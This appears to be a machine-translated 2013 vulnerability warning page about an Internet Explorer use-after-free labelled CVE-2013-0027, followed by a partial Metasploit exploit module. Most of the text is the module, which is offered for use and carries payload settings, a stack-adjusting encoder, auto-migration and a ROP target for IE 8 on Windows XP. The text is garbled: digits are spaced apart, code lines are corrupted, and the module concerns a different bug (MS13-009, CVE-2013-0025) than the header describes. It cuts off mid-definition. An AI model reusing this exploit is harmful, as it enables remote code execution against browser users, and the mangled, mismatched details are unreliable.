High-risk vulnerabilities CVE-2 0 1 3-0 0 2 7 EXP, the impact of IE on all versions-bug warning-the black bar safety net

2013-04-22T00:00:00
ID MYHACK58:62201338437
Type myhack58
Reporter 佚名
Modified 2013-04-22T00:00:00

Description

Microsoft Internet Explorer handles CPasteComma there is a use-after-free error allows constructing a malicious WEB page and entice a user to parse, can be the application context to execute arbitrary code. CVE number CVE-2 0 1 3-0 0 2 7, The impact of the version as follows:

Microsoft Internet Explorer 1 0

Microsoft Internet Explorer 9

Microsoft Internet Explorer 8

Microsoft Internet Explorer 7

Microsoft Internet Explorer 6 at Metasploit have released appropriate use of the script, as follows:

This file is part of the Metasploit Framework and may be subject to

redistribution and commercial restrictions. Please see the Metasploit

Framework web site for more information on licensing and terms of use.

http://metasploit.com/framework/

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

Rank = NormalRanking

include Msf::Exploit::Remote::HttpServer::HTML

include Msf::Exploit::RopDb

def initialize(info={})

super(update_info(info,

'Name' => "MS13-0 0 9 Microsoft Internet Explorer SLayoutRun Use-After-Free",

'Description' => %q{

This module exploits a use-after-free vulnerability in Microsoft Internet Explorer

where a CParaElement node is released but a reference is still kept

in CDoc. This memory is reused when a CDoc relayout is performed.

},

'License' => MSF_LICENSE,

'Author' =>

[

'Scott Bell <scott.bell@security-assessment.com>' # Vulnerability discovery &Metasploit module

],

'References' =>

[

[ 'CVE', '2013-0025' ],

[ 'MSB', 'MS13-0 0 9' ],

[ 'URL', 'http://security-assessment.com/files/documents/advisory/ie_slayoutrun_uaf.pdf' ]

],

'Payload' =>

{

'BadChars' => "\x00",

'Space' => 9 2 0,

'DisableNops' => true,

'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500

},

'DefaultOptions' =>

{

'InitialAutoRunScript' => 'migrate-f'

},

'Platform' => 'win',

'Targets' =>

[

[ 'Automatic', {} ],

[ 'IE 8 on Windows XP SP3', { 'Rop' => :that the msvcrt, 'Offset' = > 0x5f4 } ]

],

'Privileged' => false,

'DisclosureDate' => "Feb 1 3 2 0 1 3",

'DefaultTarget' => 0))

register_options(

[1] [2] [3] next